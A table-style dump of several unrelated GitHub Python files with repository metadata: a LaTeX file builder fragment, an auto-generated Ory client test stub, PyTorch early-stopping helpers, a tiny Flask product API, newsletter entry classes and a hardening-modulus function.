""" Return the value we need for null text. """
if value is None:
return ""
return value
@property
def header(self):
""" Return the header of a .tex file.
:rtype: String """
header = "\\documentclass"
if self.document_option:
header += "[{}]".format(self.document_option)
header += "{%s}\n" % self.document_class
header += "\\date{%s}\n" % self.date
header += "%s\n" % self._header
header += "\\begin{document}\n"
header += "%s\n" % self.intro
return header
@property
def footer(self):
""" Return the footer of a .tex file.
:rtype: String """
end = """
\\end{document}
"""
if self._footer:
return self._footer + end
return end
def save(self, path):
""" Save the document on disk. """
with open(path, "wb") as tex_file:
tex_file.write(self.document.encode("UTF-8"))
@property
def document(self):
""" Return the full text of the LatexFile.
:rtype: String"""
return "{}{}{}".format(self.header, self.text, self.footer)
| [
"aisha.manasia@gmail.com"
] | aisha.manasia@gmail.com |
d6d3e38f6d727b711d14a8cf13a3acf935cdda72 | 18239524612cf572bfeaa3e001a3f5d1b872690c | /clients/client/python/test/test_submit_self_service_login_flow.py | b4e8c0a3a77a374f30e918234b71717beae63d3c | [
"Apache-2.0"
] | permissive | simoneromano96/sdk | 2d7af9425dabc30df830a09b26841fb2e8781bf8 | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | refs/heads/master | 2023-05-09T13:50:45.485951 | 2021-05-28T12:18:27 | 2021-05-28T12:18:27 | 371,689,133 | 0 | 0 | Apache-2.0 | 2021-05-28T12:11:41 | 2021-05-28T12:11:40 | null | UTF-8 | Python | false | false | 1,198 | py | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.3
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_client
from ory_client.model.submit_self_service_login_flow_with_password_method import SubmitSelfServiceLoginFlowWithPasswordMethod
globals()['SubmitSelfServiceLoginFlowWithPasswordMethod'] = SubmitSelfServiceLoginFlowWithPasswordMethod
from ory_client.model.submit_self_service_login_flow import SubmitSelfServiceLoginFlow
class TestSubmitSelfServiceLoginFlow(unittest.TestCase):
"""SubmitSelfServiceLoginFlow unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSubmitSelfServiceLoginFlow(self):
"""Test SubmitSelfServiceLoginFlow"""
# FIXME: construct object with mandatory attributes with example values
# model = SubmitSelfServiceLoginFlow() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
af0372a202a347f36ad234e05ae02fbd63fda42e | ed1478f6407ae7757a1f24574abedeef63e59969 | /tgs/code/util_scheduler.py | 51cb7a6b531cabac1fea9791dc64001c039abfd0 | [] | no_license | gmcgsokdeuvmt/tgs | fee49704879d658078c2c3367d55a87b02645f6d | b439de777ed109c14d2c472e31a5733a5bd108cc | refs/heads/master | 2020-03-31T19:33:15.799620 | 2018-10-16T02:02:22 | 2018-10-16T02:02:22 | 152,502,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | from torch.optim.lr_scheduler import *
class EarlyStopping():
"""
Early Stopping to terminate training early under certain conditions
"""
def __init__(self,
min_delta=0,
patience=5):
"""
EarlyStopping callback to exit the training loop if training or
validation loss does not improve by a certain amount for a certain
number of epochs
Arguments
---------
monitor : string in {'val_loss', 'loss'}
whether to monitor train or val loss
min_delta : float
minimum change in monitored value to qualify as improvement.
This number should be positive.
patience : integer
number of epochs to wait for improvment before terminating.
the counter be reset after each improvment
"""
self.min_delta = min_delta
self.patience = patience
self.wait = 0
self.best_loss = 1e15
self.stopped_epoch = 0
def step(self, loss):
current_loss = loss
if current_loss is None:
pass
else:
if (current_loss - self.best_loss) < -self.min_delta:
self.best_loss = current_loss
self.wait = 1
else:
if self.wait >= self.patience:
return True
self.wait += 1
return False
class CheckBestModel():
def __init__(self):
self.best_metric = -1e15
def step(self, metric):
current_metric = metric
if current_metric is None:
pass
else:
if current_metric > self.best_metric:
self.best_metric = current_metric
return True
return False
| [
"mochimochi.morst@gmail.com"
] | mochimochi.morst@gmail.com |
7c25270962adc5f1744fd005343ac44f54a83485 | 1cb7192307a2f59ecad127a65f1c6c37a9947cb9 | /docker-compose/product/api.py | 5f66e10ac7cea9f8144f22471eca0a47ff56ac86 | [] | no_license | m2a9x45/simple-docker | cf7287d99e10831223ede39edfc90de142ea06d5 | a32334eff4094a7cd074ea44c602868a6f700a40 | refs/heads/master | 2023-05-11T06:57:11.411464 | 2020-05-16T01:29:14 | 2020-05-16T01:29:14 | 264,322,819 | 0 | 0 | null | 2023-05-01T21:40:33 | 2020-05-15T23:48:58 | PHP | UTF-8 | Python | false | false | 432 | py | from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class Product(Resource):
def get(self):
return {
'products': [
'Ice cream',
'Chocolate',
'Fruit',
'eggs'
]
}
api.add_resource(Product, '/')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True) | [
"noreply@github.com"
] | m2a9x45.noreply@github.com |
d9f5e5fc71fc1991b3a18b54effd065ae5806c57 | 726d614bab8a5ee7f0bdae0cb63f59d24bc9cccd | /py/entry_objects.py | d20202231220daede80e540b253eee93a87117f2 | [] | no_license | TritonSE/TSE-Newsletter | d47381df85d681f41fcc9ba5b179c7e4d0df205e | 4de09a3da764b9785a8e646ee45726fcd9a50534 | refs/heads/main | 2023-05-03T08:23:47.517580 | 2021-05-29T21:02:56 | 2021-05-29T21:02:56 | 322,511,298 | 0 | 0 | null | 2021-05-29T21:02:57 | 2020-12-18T06:38:17 | HTML | UTF-8 | Python | false | false | 2,780 | py | class Entry:
"""
Each section on the newsletter, such as upcoming events and milestones, can have multiple entries.
This class is used to represent a single entry which consists of a title, a description, and details regarding logistics.
Attributes:
1. title (string) - The title of the entry.
2. body (list of Content and Image objects) - Each element in the list is displayed on a new line.
3. details (list of Content objects) - Each element in the list represents a new detail regarding the event.
"""
def __init__(self, title, body, details=[]):
self.title = title
self.body = body
self.details = details
class Content:
"""
Represents a block of text within an entry's body and details.
Attributes:
1. desc (list of Text, Link, UnorderedList, and Linebreaks objects) - Each element in the list represents one aspect of the details/body.
"""
def __init__(self, desc):
self.desc = desc
class Image:
"""
Represents an image to be displayed.
Attributes:
1. url (string) - The url of the image to be displayed.
2. alt (string) - Alternative text to be displayed if the image is not rendered.
3. is_logo (string) - Whether or not the image is a logo
"""
def __init__(self, url, alt, is_logo=False):
self.url = url
self.alt = alt
self.is_logo = is_logo
class Text:
"""
Represents a portion of text of an entry's body.
Attributes:
1. text (string) - The actual text that needs to be displayed.
"""
def __init__(self, text):
self.text = text
class Link(Text):
"""
Inherits from the Text class.
Represents a portion of text of an entry's body that is linked to a url.
Attributes:
1. url (string) - The url that the text is being mapped to.
"""
def __init__(self, text, url):
super().__init__(text)
self.url = url
class Linebreak:
"""
Represents linebreaks within the body of an entry.
Placed between Text and Image objects within a list for an entry's body to create
whitelines between bodies of text and images.
Attributes:
1. numBreaks (integer) - The number of extra lines to be added.
"""
def __init__(self, numBreaks):
self.numBreaks = numBreaks
class LinesList:
"""
Represents an unordered/ordered list within the body of an entry.
Only applicable to left-oriented entries.
Attributes:
1. ordered (boolean) - Whether or not the list is ordered or unordered.
2. listLines (list of strings) - A list of the lines in the unordered/ordered list.
"""
def __init__(self, ordered = False, list_lines = []):
self.ordered = ordered
self.list_lines = list_lines | [
"noreply@github.com"
] | TritonSE.noreply@github.com |
679b56d7e69148380eea52a77a6f54987348114c | 896ae2c9853793c9cb3b2cfd771be2927c09e2eb | /Library/evalH.py | 0e071bbf6b5653d890bb5008e64787250a03b612 | [
"MIT"
] | permissive | JustinBonus/Borja-Amies | 23adb713cc8f1a8051d73e4cce0c12a083dd0f49 | 5560879df9bc0cc8da2f6273b161c30f82702e1e | refs/heads/main | 2023-01-25T04:31:22.648032 | 2020-12-11T23:20:48 | 2020-12-11T23:20:48 | 320,693,220 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | def evalH(param, kappa):
#s = evalH(param, kappa) returns the value of H=h*kappa^m (AKA exponential hardening moduli)
if kappa < 0:
s = 1.0e-10
return s
s = param.hh*(kappa)**param.mm
return s
| [
"noreply@github.com"
] | JustinBonus.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.